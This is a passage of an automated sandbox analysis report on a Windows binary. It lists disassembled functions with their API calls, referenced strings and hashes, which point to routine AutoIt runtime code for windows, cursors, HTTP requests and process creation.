                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 799131459-1154884017
                                                                    • Opcode ID: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
                                                                    • Instruction ID: 5392ec6da03866de8e1c0166535c5e0d954c4588b977fb8ce0a243bef75b9ab6
                                                                    • Opcode Fuzzy Hash: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
                                                                    • Instruction Fuzzy Hash: 6661D0B2644205BEEB14DF64CC8ABBF77ACFB44B11F108549F919D60E1DBB4A980D7A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 0-1645009161
                                                                    • Opcode ID: 89eed95322d5ec475ff4d535fb3cd7f7d992bc29dbc25cfda25f79198e08a5c2
                                                                    • Instruction ID: 5b4a89b3e3d20b8770132fbfbf269f92867c1f182370e53a97fcd215d91e8236
                                                                    • Opcode Fuzzy Hash: 89eed95322d5ec475ff4d535fb3cd7f7d992bc29dbc25cfda25f79198e08a5c2
                                                                    • Instruction Fuzzy Hash: 4281D171604219BFDB21AF65DC42FAF37A8FF96304F054024F909EA196EB70DA51C7A1
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 00945A2E
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00945A40
                                                                    • SetWindowTextW.USER32(?,?), ref: 00945A57
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00945A6C
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00945A72
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00945A82
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00945A88
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00945AA9
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00945AC3
                                                                    • GetWindowRect.USER32(?,?), ref: 00945ACC
                                                                    • _wcslen.LIBCMT ref: 00945B33
                                                                    • SetWindowTextW.USER32(?,?), ref: 00945B6F
                                                                    • GetDesktopWindow.USER32 ref: 00945B75
                                                                    • GetWindowRect.USER32(00000000), ref: 00945B7C
                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00945BD3
                                                                    • GetClientRect.USER32(?,?), ref: 00945BE0
                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00945C05
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00945C2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                    • String ID:
                                                                    • API String ID: 895679908-0
                                                                    • Opcode ID: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
                                                                    • Instruction ID: 7cb1cb004e8e70506b8541f405d11df5015674f2eb64001ba2fb0ee8d9f5a1b7
                                                                    • Opcode Fuzzy Hash: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
                                                                    • Instruction Fuzzy Hash: C5717C71900B09AFDB20DFA8CE85E6EBBF9FF48704F114A1CE586A25A1D775E940CB10
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 0095FE27
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0095FE32
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0095FE3D
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0095FE48
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0095FE53
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0095FE5E
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0095FE69
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 0095FE74
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 0095FE7F
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0095FE8A
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 0095FE95
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 0095FEA0
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0095FEAB
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 0095FEB6
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0095FEC1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0095FECC
                                                                    • GetCursorInfo.USER32(?), ref: 0095FEDC
                                                                    • GetLastError.KERNEL32 ref: 0095FF1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 3215588206-0
                                                                    • Opcode ID: e6af913c1f453c5094b2ae903202aecb88b7712ddc098077f35e7ecebc97a2ff
                                                                    • Instruction ID: a31d3e990cabc79653c86a48302d20ae88315c6d654857532632417398d6bf96
                                                                    • Opcode Fuzzy Hash: e6af913c1f453c5094b2ae903202aecb88b7712ddc098077f35e7ecebc97a2ff
                                                                    • Instruction Fuzzy Hash: 634172B0D083196ADB10DFBA8C8985EBFE8FF04364B50452AE51DE7281DB78E901CF91
                                                                    APIs
                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009000C6
                                                                      • Part of subcall function 009000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(009B070C,00000FA0,1F0F46BC,?,?,?,?,009223B3,000000FF), ref: 0090011C
                                                                      • Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009223B3,000000FF), ref: 00900127
                                                                      • Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009223B3,000000FF), ref: 00900138
                                                                      • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0090014E
                                                                      • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0090015C
                                                                      • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0090016A
                                                                      • Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00900195
                                                                      • Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009001A0
                                                                    • ___scrt_fastfail.LIBCMT ref: 009000E7
                                                                      • Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9
                                                                    Strings
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00900122
                                                                    • kernel32.dll, xrefs: 00900133
                                                                    • SleepConditionVariableCS, xrefs: 00900154
                                                                    • WakeAllConditionVariable, xrefs: 00900162
                                                                    • InitializeConditionVariable, xrefs: 00900148
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 66158676-1714406822
                                                                    • Opcode ID: 7918f89307d60963ad5baefd8b02c012ae62bbc02a9ec8af9477d2c2bda33536
                                                                    • Instruction ID: 0c25e94b647f3e5a6ba9e183c9b154ee8945522f122c3881eed56263b03707cd
                                                                    • Instruction Fuzzy Hash: F821297365C7106FD7205BB4AC4AB6A73A8EFC6B64F00413AF909E72D1DF7098009A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 176396367-1603158881
                                                                    • Opcode ID: 4e3a3b148982f0ba8b0942e441055e2bf00e267df2b25619cb7299dc79206d7b
                                                                    • Instruction ID: 22e996ddf934af75e2f4891e1597d999a71b33ea2fd5e63b9a33bc259995b6b9
                                                                    • Instruction Fuzzy Hash: 75E1F532A00516ABCB289F78C451FEDBBB8FF45710F54C129E566E7290DB70AE8587A0
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(00000000,00000000,0097CC08), ref: 00954527
                                                                    • _wcslen.LIBCMT ref: 0095453B
                                                                    • _wcslen.LIBCMT ref: 00954599
                                                                    • _wcslen.LIBCMT ref: 009545F4
                                                                    • _wcslen.LIBCMT ref: 0095463F
                                                                    • _wcslen.LIBCMT ref: 009546A7
                                                                      • Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD
                                                                    • GetDriveTypeW.KERNEL32(?,009A6BF0,00000061), ref: 00954743
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2055661098-1000479233
                                                                    • Opcode ID: 176dcccbf62e3e1cdeea337e3935e79467a4414c5c975b51db17c7e58b2bebb1
                                                                    • Instruction ID: 26c53baa0af21e40001631192da74509bb44a69a8bfde2b899d56d865e7bdf82
                                                                    • Instruction Fuzzy Hash: D5B138316083029FC750DF2AC890A6AB7E8FF96759F50491DF996C7291E730DC89CB92
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 0096B198
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1B0
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1D4
                                                                    • _wcslen.LIBCMT ref: 0096B200
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B214
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B236
                                                                    • _wcslen.LIBCMT ref: 0096B332
                                                                      • Part of subcall function 009505A7: GetStdHandle.KERNEL32(000000F6), ref: 009505C6
                                                                    • _wcslen.LIBCMT ref: 0096B34B
                                                                    • _wcslen.LIBCMT ref: 0096B366
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096B3B6
                                                                    • GetLastError.KERNEL32(00000000), ref: 0096B407
                                                                    • CloseHandle.KERNEL32(?), ref: 0096B439
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096B44A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096B45C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096B46E
                                                                    • CloseHandle.KERNEL32(?), ref: 0096B4E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 2178637699-0
                                                                    • Opcode ID: 418f7d75e96cb3f84411771a51c928a1f449c0974db82d757bf866bfe80a7de7
                                                                    • Instruction ID: c1dd8dc48dca4213bd08d5eb01406b61a58214a16dc8d8ad9d2c7eeb2395b445
                                                                    • Instruction Fuzzy Hash: 54F18E716083409FC714EF29C891B2ABBE5FF85714F14855DF9998B2A2DB31DC84CB52
                                                                    APIs
                                                                    • GetMenuItemCount.USER32(009B1990), ref: 00922F8D
                                                                    • GetMenuItemCount.USER32(009B1990), ref: 0092303D
                                                                    • GetCursorPos.USER32(?), ref: 00923081
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0092308A
                                                                    • TrackPopupMenuEx.USER32(009B1990,00000000,?,00000000,00000000,00000000), ref: 0092309D
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009230A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                    • String ID: 0
                                                                    • API String ID: 36266755-4108050209
                                                                    • Opcode ID: ab0b6c46cf41f0457aab5f6776e6cf6f351bebc6ccf430e1bd4cb0624c9f3486
                                                                    • Instruction ID: a4228584f9b47cf262377b6cb2130d09c9e9acd5e58a3034a3a80341c992ae76
                                                                    • Instruction Fuzzy Hash: 8E714B71644215BEEB258F25DD89FAABF78FF01324F204206F618AB1E0C7B1AD50DB50
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?), ref: 00976DEB
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00976E5F
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00976E81
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976E94
                                                                    • DestroyWindow.USER32(?), ref: 00976EB5
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 00976EE4
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976EFD
                                                                    • GetDesktopWindow.USER32 ref: 00976F16
                                                                    • GetWindowRect.USER32(00000000), ref: 00976F1D
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00976F35
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00976F4D
                                                                      • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 2429346358-3619404913
                                                                    • Opcode ID: 881a5507634c9c7e4e9f13044825debc907b8069939d32962bfabd576c858c90
                                                                    • Instruction ID: aa9af0f17ab9ad994b1b4a5bfa2617feffd31e0b601a8d2eede28653ed9b4aa7
                                                                    • Instruction Fuzzy Hash: 2F719872108241AFDB21DF28DC58FBABBF9FB89304F54491DF98987261C770A949DB12
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00979147
                                                                      • Part of subcall function 00977674: ClientToScreen.USER32(?,?), ref: 0097769A
                                                                      • Part of subcall function 00977674: GetWindowRect.USER32(?,?), ref: 00977710
                                                                      • Part of subcall function 00977674: PtInRect.USER32(?,?,00978B89), ref: 00977720
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009791B0
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009791BB
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009791DE
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00979225
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0097923E
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00979255
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00979277
                                                                    • DragFinish.SHELL32(?), ref: 0097927E
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00979371
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 221274066-3440237614
                                                                    • Opcode ID: db34b12b1cfdf2938c2b2a8edb836221a7d4996133e665ca5f33017c535f1ee9
                                                                    • Instruction ID: 164424bc6c56d67bc44ed3bc987c83d7326fe63b13c16e1a7229142288485ffb
                                                                    • Instruction Fuzzy Hash: 31616772108341AFC701EF65DC85DAFBBE8FB89750F40092EF5A5921A1DB709A49CB92
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C4B0
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C4C3
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C4D7
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0095C4F0
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0095C533
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0095C549
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C554
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C584
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C5DC
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C5F0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0095C5FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                    • String ID:
                                                                    • API String ID: 3800310941-3916222277
                                                                    • Opcode ID: f5a7d149d1954c0613666d99f44cd73ae2fabff037be8b3c293921af234f0a79
                                                                    • Instruction ID: 7668a32dc1b8551235d73459f09717a4b6dd8ab2bcc04911e9db3adca0b70243
                                                                    • Instruction Fuzzy Hash: E7514EF1504305BFDB21CFA6C988AAB7BBCFF04755F00441DF94996250EB34EA49AB60
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00978592
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 009785A2
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 009785AD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 009785BA
                                                                    • GlobalLock.KERNEL32(00000000), ref: 009785C8
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009785D7
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 009785E0
                                                                    • CloseHandle.KERNEL32(00000000), ref: 009785E7
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009785F8
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,?), ref: 00978611
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00978621
                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00978641
                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00978671
                                                                    • DeleteObject.GDI32(00000000), ref: 00978699
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009786AF
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
• Instruction ID: 095435c52bee59a0c49331333d9c2b7a8e4b5584771e5023529c82313f390eac
• Opcode Fuzzy Hash: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
• Instruction Fuzzy Hash: B54118B6644205BFDB119FA5CC8CEAB7BBCEF89B15F108058F919E7260DB309941DB60
APIs
• VariantInit.OLEAUT32(00000000), ref: 00951502
• VariantCopy.OLEAUT32(?,?), ref: 0095150B
• VariantClear.OLEAUT32(?), ref: 00951517
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009515FB
• VarR8FromDec.OLEAUT32(?,?), ref: 00951657
• VariantInit.OLEAUT32(?), ref: 00951708
• SysFreeString.OLEAUT32(?), ref: 0095178C
• VariantClear.OLEAUT32(?), ref: 009517D8
• VariantClear.OLEAUT32(?), ref: 009517E7
• VariantInit.OLEAUT32(00000000), ref: 00951823
Strings
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
• Opcode ID: 1c2e76688c29389a59fe8272206e19b484f5ca5cc40a1534847f6a4c01277b20
• Instruction ID: b152dc8c1091713c57926e449b77d4a2dd89149fd8e40cd967d8a78a79f56c55
